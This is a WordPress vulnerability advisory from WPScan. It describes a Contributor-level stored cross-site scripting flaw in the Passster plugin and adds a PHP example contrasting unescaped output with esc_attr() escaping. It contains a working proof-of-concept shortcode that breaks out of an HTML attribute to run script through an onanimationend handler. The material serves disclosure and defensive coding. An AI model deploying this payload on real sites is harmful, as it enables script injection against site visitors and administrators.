Source: wpvulndb
Reporter: Apple502j
WPVDB-ID: 5FEA3AC3-D599-41F3-8F76-08F0D3552AF1
Published: Dec 29, 2022 - 12:00 a.m.

Passster < 3.5.5.8 - Contributor+ Stored Cross-Site Scripting

wpscan.com
6
Tags: passster, plugin, vulnerability, stored xss, cross-site scripting

EPSS: 0.001
Percentile: 23.5%

The plugin does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.

PoC

[passster password="1" area='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS/)//']
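
The missing output escaping described above, shown as an added PHP illustration (not Passster's code and not part of the original advisory). The handler names, the data-area markup and the sample value are assumptions; esc_attr() is WordPress's attribute-escaping function, stubbed here with htmlspecialchars() so the file also runs outside WordPress.

```php
<?php
// Added illustration, not Passster's source: function names and markup are hypothetical.

// Outside WordPress, stand in for esc_attr() so this file runs on its own.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Unescaped pattern: the shortcode attribute is concatenated straight into
// a double-quoted HTML attribute.
function demo_render_unescaped(array $atts) {
    $area = isset($atts['area']) ? (string) $atts['area'] : '';
    return '<div class="demo-protected" data-area="' . $area . '"></div>';
}

// Hardened pattern: escape for the attribute context at the point of output.
function demo_render_escaped(array $atts) {
    $area = isset($atts['area']) ? (string) $atts['area'] : '';
    return '<div class="demo-protected" data-area="' . esc_attr($area) . '"></div>';
}

// Regression check: parse the markup and list the attribute names on the <div>.
// Any name beyond class and data-area means the value escaped its quotes.
function demo_attribute_names($html) {
    libxml_use_internal_errors(true);   // keep parser warnings off the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = array();
    foreach ($doc->getElementsByTagName('div')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// Constructed input: a harmless value containing a double quote.
$atts = array('area' => '" data-injected="1');

foreach (array('demo_render_unescaped', 'demo_render_escaped') as $render) {
    $html = $render($atts);
    echo $render, ': ', $html, "\n";
    echo '  attributes seen by parser: ', implode(', ', demo_attribute_names($html)), "\n";
}
```

Escaping at the point of output matters here because a Contributor controls the shortcode text, so the attribute value cannot be trusted even though it comes from an authenticated user.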
